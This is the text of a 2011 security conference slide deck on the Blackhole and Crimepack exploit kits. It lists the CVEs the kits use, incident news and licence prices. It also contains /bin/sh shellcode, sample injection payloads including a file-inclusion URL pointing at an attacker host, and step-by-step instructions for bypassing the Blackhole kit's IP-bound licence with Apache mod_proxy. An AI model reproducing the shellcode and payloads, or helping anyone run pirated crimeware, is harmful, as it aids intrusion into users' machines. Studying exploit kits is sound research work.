Upload
clubhack
View
2.902
Download
5
Embed Size (px)
DESCRIPTION
ClubHack 2011 Hacking and Security Conference.Talk - Exploit the Exploit KitsSpeaker - Dhruv Soi
Citation preview
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Exploit The Exploit Kits
Presented By:
Dhruv Soi
Chief Mentor @ Hacker Distinct Objects Director @ Torrid Networks Chair @OWASP India
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Disclaimer
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Agenda
#whoami Segmentation Fault
#./exploit –mode Basics AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#history; lastlog ummm
#watch ‘demo –kits blackhole crimepack’ Boom!
#make –bypass License Oops!
#shutdown -r now “Questions?“ Thank You
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Who am I?
Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India
Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS
Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal
Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity
Expertise – None. Only passionate about InfoSec, just another learner!
Organizer for OWASP Asia 2009 – Director - NTRO, CBI Director, US – White House Cyber Czar, Ex-CIA Director invited as Chief Guest
OWASP 2012 – Be Ready!
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Basics of Exploitation
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Art of Exploitation
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Vulnerability to Exploitation
8
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Practical Exploitation
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Software Vulnerabilities @ Glance
Buffer Overflow
Format String
Code/File Injection
Privilege Escalation
Denial of Service
10
global code_start global code_end .data code_start: jmp 0x17 popl %esi movl %esi,0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) my_execve: movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx xorl %edx,%edx int $0x80 call -0x1c .string "/bin/shX" code_end:
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Application Vulnerabilities @ Glance
SQL Injection ‘ OR 1=1--
Cross Site Scripting <script>alert(“Hello”)</script>
File Inclusion /index.php?page=http://www.attacker.com/attack.txt
Command Injection
/lookup.php|dir c:
Session Hijack
.
.
11
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Traditional Attack Scenario
Identify Target
Port Scan
Vulnerability Identification
Exploit
Privilege Elevation
Access Resources
Replicate to other targets (worms)
12
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Attack Challenges
Identifying a user not on internet (public/static IP address)?
LAN Users
Attacking a user behind Firewall
Network Firewalls
Host based Firewalls
Patched Machines, Latest Exploits (0-Days)
Antivirus
Too much manual work - Time is money!
13
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
From Servers to Client
Identify user from social networks, search engines, emails, address book, logs or behavior
Target Client Side Attacks Browser based (Mozilla, IE, Safari, etc.)
Adobe Reader
Adobe Flash
Sun Java
Media Players
User needs to click the URL pointing to hosted exploit Send Email
Insert to his favorite website
14
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Client Side Vulnerabilities - Metasploit
Microsoft Windows WebDAV Application DLL Hijacker
Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
Microsoft Windows Shell LNK Code Execution (MS10-046)
Microsoft Help Center XSS and Command Execution (MS10-042)
Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
FireFox 3.5 escape Return Value Memory CorruptionAdobe PDF Embedded EXE Social Engineering
Firefox location.QueryInterface() Code Execution
Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
Mozilla Suite/Firefox Navigator Object Code Execution
Adobe Collab.getIcon() Buffer Overflow
Adobe Collab.collectEmailInfo() Buffer Overflow
Adobe Flash Player "newfunction" Invalid Pointer Use
Adobe Flash Player "Button" Remote Code Execution
Sun Java Calendar Deserialization Exploit
Sun Java JRE getSoundbank file:// URI Buffer Overflow
Sun Java JRE AWT setDiffICM Buffer Overflow
Too many exploits, too lesser time! 15
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 16
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Java Rhino
17
CVE-2011-3544 : Java Applet Rhino Script Engine Remote Code Execution
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 18
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 19
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Demonstration Time…
20
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 21
Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 22
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Exploit Kits
PHP, Mysql, List of Exploits, Obfuscated Code
Centralized Console – Dashboards
Generates iFrame
Sends exploits automatically to the victim browser on visiting the website (iFrame)
Pushes the payload (Bot, Trojan, Keylogger) to the victim’s machine on successful exploitation
Records the stats
OOPS! Antivirus Evasion, Scanning
All Automated – Sometimes its good to be lazy!
23
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Blackhole & Crimepack
24
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Blackhole Exploits
Internet Explorer CVE-2010-1885 HCP
CVE-2006-0003 IE MDAC
Adobe Software CVE-2008-2992 Adobe Reader util.printf
CVE-2009-0927 Adobe Reader Collab GetIcon
CVE-2007-5659 Adobe Reader CollectEmailInfo
Java Software CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in
deploytk.dll
CVE-2010-0840 Java trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin
25
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Crimepack Exploits
name="mdac" desc="IE6 COM CreateObject Code
Execution" CVE-2006-0003
name="msiemc" desc="IE7 Uninitialized Memory
Corruption" CVE-2010-0806
name="java" desc="JRE getSoundBank Stack BOF"
CVE-2009-3867
name="iepeers" desc="IEPeers Remote Code Execution"
CVE-2010-0806
name="pdfexpl" desc="PDF Exploits [collectEmailInfo
(CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]"
name="opera" desc="Opera TN3270" CVE-2009-3269
26
name="aol" desc="AOL Radio AmpX Buffer
Overflow" CVE-2007-5755
name="iexml" desc="Internet Explorer 7 XML Exploit"
CVE-2008-4844
name="firefoxdiffer" desc="Firefox 3.5/1.4/1.5 exploits" CVE-
2009-355
name="libtiff" desc="Adobe Acrobat LibTIFF Integer
Overflow" CVE-2010-0188
name="spreadsheet" desc="OWC Spreadsheet Memory
Corruption" CVE-2009-1136
name="activexbundle" desc="Bundle of ActiveX exploits" CVE-
2008-2463
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 27
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Crimepack
28
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Blackhole, hick hick!
29
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Whew! Demonstration Time...
30
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Exploit Kits in News
November 2, 2011: Blackhole Exploit Kit attack on WampServer & Wordpress sites
October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site that's hosting the Nice Pack exploit kit
September 27, 2011: MySQL.com hacked to serve malware
May 17, 2011: Geek.com Site Hacked Via Blackhole Exploit Kit
April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit
May 05, 2010: U.S. Treasury Website Hacked Using Exploit Kit
31
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
There are just too many of those….
32
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Data Leakage, Even Exploit Kits!
May 22, 2011: First Public Release of BlackHole Exploit Kit!
May 14, 2011: Crimepack 3.1.3 Exploit kit Leaked, available for Download!
May 13, 2011: 26 Underground Hacking Exploit Kit available for Download!
April 14, 2011: Phoenix exploit kit 2.5 leaked, Download Now!
33
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Managed Hacking Services
Blackhole Deal – Am ain’t their marketing guy!
Annual license: $ 1500
Half-year license: $ 1000
3-month license: $ 700
Update FUD $ 50
Changing domain $ 20 multidomain $ 200 to license.
During the term of the license all the updates are free.
Rent on Blackhole servers:
• 1 week (7 full days): $ 200
• 2 weeks (14 full days): $ 300
• 3 weeks (21 full day): $ 400
• 4 weeks (31 full day): $ 500
• 24-hour test: $ 50
34
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Obfuscated Code…
35
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Bypass License
License is bound to IP (Public IP – IP1), kit checks for the IP from the HTTP headers and grants access
How about configuring your server with the IP address on which Kit is built upon? – Routing issues?
Configure owned public IP - eth0 (IP2), configure exploit kits public IP - eth1 (IP1)
Configure Apache VirtualHost IP1:80 with exploit kit path
Configure Apache VirtualHost IP2:80 with mod_proxy module
Configure Apache mod_proxy to forward the request from IP2:80 IP1:80
Kit thinks its license is in use since the request are coming to IP1
36
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Protecting from Exploit Kits?
Out of Scope for now!
37
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
We are hiring!
38
Malware Writers
Exploit Writers
InfoSec Trainers Onsite
Opportunity in South Africa
© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do
Questions?
39
SANTA